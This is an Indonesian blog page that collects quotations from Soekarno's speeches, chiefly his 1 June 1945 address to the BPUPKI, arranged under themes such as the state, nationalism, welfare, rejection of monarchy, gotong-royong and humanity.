§ Kemerdekaan hanyalah diperdapat dan dimiliki oleh bangsa yang jiwanya berkobar-kobar dengan tekad 'Merdeka, merdeka atau mati'!


§ Sumber: Soekarno, Pidato di BPUPKI, 1 Juni 1945




NEGARA


§ Saudara-saudara yang bernama kaum kebangsaan yang di sini, maupun Saudara-saudara yang dinamakan kaum Islam, semuanya telah mufakat, bahwa bukan negara yang demikian itulah kita punya tujuan. kita hendak mendirikan suatu Negara 'semua buat semua'. Bukan buat satu orang, bukan buat satu golongan, baik golongan bangsawan, maupun golongan yang kaya, tetapi 'semua buat semua'.


§ Sumber: Soekarno, Pidato di BPUPKI, 1 Juni 1945


§ Kita mendirikan negara Indonesia, yang kita semua harus mendukungnya. Semua buat semua! Bukan Kristen buat Indonesia, bukan golongan Islam buat Indonesia, bukan Hadikoesoemo buat Indonesia, bukan Van Eck buat Indonesia, bukan Nitisemito yang kaya buat Indonesia, tetapi Indonesia buat Indonesia, semua buat semua!


§ Sumber: Soekarno, Pidato di BPUPKI, 1 Juni 1945


§ Negara Republik Indonesia ini bukan milik sesuatu golongan, bukan milik sesuatu agama, bukan milik sesuatu suku, bukan milik sesuatu golongan adat-istiadat, tetapi milik kita semua dari Sabang sampai Merauke!


§ Sumber: Soekarno, "Pidato di Surabaya, 24 September 1955''


§ "Saudara-saudara dan rombongan : Buka mata, Buka mata! Buka otak! Buka telinga! Perhatikan, perhatikan keadaan! Perhatikan keadaan dan sedapat mungkin carilah pelajaran dari hal hal ini semuanya, agar supaya saudara saudara dapat mempergunakan itu dalam pekerjaan raksasa kita membangun Negara dan Tanah Air!".


§ Kutipan Pidato Bung Karno di Semarang, 29 Juli 1956




KEBANGSAAN/NASIONALISME


§ Kebangsaan Indonesia yang bulat! Bukan kebangsaan Jawa, bukan kebangsaan Sumatra, bukan kebangsaan Borneo, Sulawesi, Bali atau lain-lain, tetapi kebangsaan Indonesia, yang bersama-sama menjadi dasar satu nationale staat.


§ Sumber: Soekarno, Pidato di BPUPKI, 1 Juni 1945


§ Internationalisme tidak dapat hidup subur, kalau tidak berakar di dalam buminya nasionalisme. Nasionalisme tidak dapat hidup subur, kalau tidak hidup dalam taman sarinya internasionalisme.


§ Sumber: Soekarno, Pidato di BPUPKI, 1 Juni 1945


§ "Jikalau ingin menjadi satu bangsa yang besar, ingin menjadi bangsa yang mempunyai kehendak untuk bekerja, perlu pula mempunyai "imagination!"


§ Kutipan Pidato Bung Karno di Semarang, 29 Juli 1956


§ "imagination" , " imagination" "imagination "!!! Ciptaan besar!!! Kita yang dahulu bisa menciptakan candi-candi besar seperti Borobudur, dan Prambanan, terbuat dari batu yang sampai sekarang belum hancur ; kini kita telah menjadi satu bangsa yang kecil jiwanya, Saudara-saudara !! Satu bangsa yang sedang dicandra-cengkala kan didalam candra-cengkala jatuhnya Majapahit, sirna hilang kertaning bumi!! Kertaning bumi hilang , sudah sirna sama sekali. Menjadi satu bangsa yang kecil, satu bangsa tugu "rong depa"


§ Kutipan Pidato Bung Karno di Semarang, 29 Juli 1956


KESEJAHTERAAN


§ Kalau kita mencari demokrasi hendaknya bukan demokrasi barat, tetapi permusyawaratan yang memberi hdup, yakni politik economische democratie yang mampu mendatangkankesejahteraan sosial! Rakyat Indonesia sudah lama bicara tentang hal ini. Apakah yang dimaksud dengan Ratu Adil? Yang dimaksud dengan faham Ratu Adil ialah social rechtvaardigheid. Rakyat ingin sejahtera. Rakyat yang tadinya merasa dirinya kurang makan kurang pakaian, menciptakan dunia baru yang di dalmnya ada keadilan, di bawah pimpinan Ratu-Adil.


§ Sumber: Soekarno, Pidato di BPUPKI, 1 Juni 1945




MONARKI


§ Jikalau pada suatu hari Ki Bagoes Hadikoesoemo misalnya, menjadi Kepala Negara Indonesia, dan mangkat, meninggal dunia, jangan anaknya Ki Hadikoesoemo dengan sendirinya, dengan otomatis menjadi pengganti Ki Hadikoesoemo. Maka oleh karena itu saya tidak mufakat kepada prinsip monarki itu.


§ Sumber: Soekarno, Pidato di BPUPKI, 1 Juni 1945




GOTONG-ROYONG


§ Kekeluargaan adalah suatu faham yang statis, tetapi gotong-royong menggambarkan satu usaha, satu amal, satu pekerjaan, yang dinamakan anggota terhormat Soekardjo satukaryo, satu gawe.


§ Sumber: Soekarno, Pidato di BPUPKI, 1 Juni 1945


§ Gotong royong adalah pembantingan tulang bersama, pemerasan keringat bersama, perjuangan bantu-membantu bersama. Amal semua buat kepentingan semua, keringat semua buat kebahagiaan semua. Ho-lopis-kuntul-baris buat kepentingan bersama!


§ Sumber: Soekarno, Pidato di BPUPKI, 1 Juni 1945


KEMANUSIAAN


§ 'Bahwa manusia di dunia ini, Saudara-saudara, "basically" - pada dasar dan hakekatnya - adalah sama; tidak beda satu sama lain. Dan oleh karena itu manusia inilah yang harus diperhatikan'


§ Kutipan Pidato Bung Karno di Semarang 29 Juli 1956


Categories: , , , , , ,

Copyright © Johannes Dwi Cahyo | Powered by Blogger

Design by Anders Noren | Blogger Theme by NewBloggerThemes.com | BTheme.net      Up ↑